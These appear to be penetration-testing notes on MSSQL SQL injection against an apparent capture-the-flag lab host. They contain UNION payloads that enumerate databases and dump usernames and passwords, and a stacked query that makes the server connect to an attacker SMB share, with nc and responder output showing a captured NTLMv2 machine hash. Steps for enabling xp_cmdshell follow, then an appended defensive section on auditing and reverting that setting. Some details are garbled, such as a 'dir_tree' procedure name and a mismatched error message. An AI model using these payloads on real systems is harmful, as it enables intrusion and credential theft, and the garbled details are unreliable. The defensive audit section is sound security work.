In SQL Server, each table belongs to a specific schema (e.g., dbo, sales, hr, etc.). If you do not specify a schema, SQL Server resolves the name against the default schema of the current user, which is dbo by default. The table might therefore exist under a different schema than the one being searched.
SELECT * from flags;
// ('42S02', "[42S02] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Invalid object name '#flags'. (208) (SQLExecDirectW)")
In this case, the database and schema must be specified explicitly using a three-part name (database.schema.table).
SELECT * from app.dbo.flags;
Below are the default MSSQL system databases.

Database   Description
master     Keeps the information for an instance of SQL Server
msdb       Used by SQL Server Agent
model      Template database copied for each new database
resource   Read-only; holds the system objects that appear in the sys schema of every database on the server
tempdb     Keeps temporary objects for SQL queries
Users
sa is the default administrator-level account in MSSQL.
Usage
SELECT @@version;
SELECT system_user;
SELECT name FROM sys.databases;
SELECT * FROM <database>.information_schema.tables;
SELECT column_name, data_type FROM <database>.information_schema.columns WHERE table_name = '<tableName>';
When querying from a CLI tool, end each SQL statement with ; and submit the batch by entering GO on a separate line.
q=anger' ORDER BY 1;--
q=anger' UNION SELECT NULL;--
q=anger' UNION SELECT 1;--
q=anger1' UNION SELECT 'a',2,3,4,5,6;-- -
# check connection back with nc on port 445, and then responder
q=anger1'; exec dir_tree '\\<attack-ip>\\sharename\file'--
# first connection
sudo nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.14.121] from (UNKNOWN) [10.10.11.158] 50883
E�SMBrS�����"NT LM 0.12SMB 2.002SMB 2.???^C
# second connection
sudo responder -I tun0
<SNIP>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.158
[SMB] NTLMv2-SSP Username : streamIO\DC$
[SMB] NTLMv2-SSP Hash : DC$::streamIO:c45d729b18399cdd<SNIP>
# wildcards in MSSQL
SELECT * FROM movies WHERE name LIKE '%anger%';
SELECT * FROM movies WHERE CONTAINS (name,'*500*');
q=anger1' UNION SELECT 1,@@version,3,4,5,6;--
q=anger1' UNION SELECT 1,name,3,4,5,6 FROM master..sysdatabases--
q=anger1' UNION SELECT 1,name,3,4,5,6 FROM sys.databases--
q=anger1' UNION SELECT 1,CONCAT(name,':',id),3,4,5,6 FROM streamio..sysobjects--
q=anger1' UNION SELECT 1,name,3,4,5,6 FROM streamio..syscolumns WHERE id=901578250--
q=anger1' UNION SELECT 1,(SELECT STRING_AGG(CONCAT(username,':',password),'|') FROM users),3,4,5,6--
RCE
xp_cmdshell is disabled by default.
Functions that can lead to code execution are usually either disabled or restricted to privileged users. In MSSQL, the xp_cmdshell extended stored procedure takes a string, passes it to a command shell for execution, and returns the output as rows of text. Because enabling and calling it requires separate statements, exploiting a SQLi flaw for RCE typically depends on the injection point allowing stacked queries.
-- allow advanced options to be modified
EXECUTE sp_configure 'show advanced options', 1;
GO
-- update the currently configured value for advanced options
RECONFIGURE;
GO
-- enable the feature
EXECUTE sp_configure 'xp_cmdshell', 1;
GO
-- update the currently configured value for this feature
RECONFIGURE;
GO
Once the feature is enabled, the command is run in a shell with the same permissions as the SQL Server service account.
The Linux version of MSSQL does not support xp_cmdshell.
-- use the feature
EXECUTE xp_cmdshell 'command to run here';
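The sp_configure sequence above is visible from the defender's side. The following T-SQL is an added example (not from the original notes) for auditing a SQL Server instance: it reads the current state of the two options, searches the error log for the configuration-change message that sp_configure writes, lists which database principals hold explicit permissions on the procedure, and shows the statements that revert the change. Running it requires a login with sysadmin or equivalent rights; nothing here is specific to the target on the page.

```sql
-- Added example, not part of the original notes: audit and revert xp_cmdshell.

-- 1. Configured value vs. the value actually in use for both options.
--    value = 1 with value_in_use = 0 means a change is pending RECONFIGURE.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
GO

-- 2. Every sp_configure change is written to the SQL Server error log as
--    "Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install."
--    Arguments: log number (0 = current), log type (1 = SQL Server), search string.
EXEC master.dbo.xp_readerrorlog 0, 1, N'xp_cmdshell';
GO

-- 3. Principals with explicit grants on the procedure. Members of sysadmin
--    can run it regardless, so review that role's membership separately.
SELECT dp.name AS principal_name, p.permission_name, p.state_desc
FROM master.sys.database_permissions AS p
JOIN master.sys.database_principals AS dp
  ON dp.principal_id = p.grantee_principal_id
WHERE p.major_id = OBJECT_ID('master.dbo.xp_cmdshell');
GO

-- 4. Revert: disable the procedure and hide advanced options again.
EXECUTE sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXECUTE sp_configure 'show advanced options', 0;
RECONFIGURE;
GO
```

Because the option lives in sys.configurations, the first query is cheap enough to schedule as a periodic check; a transition from 0 to 1 that nobody requested, or an error-log entry for it outside a change window, is the signal to investigate the service account's recent activity.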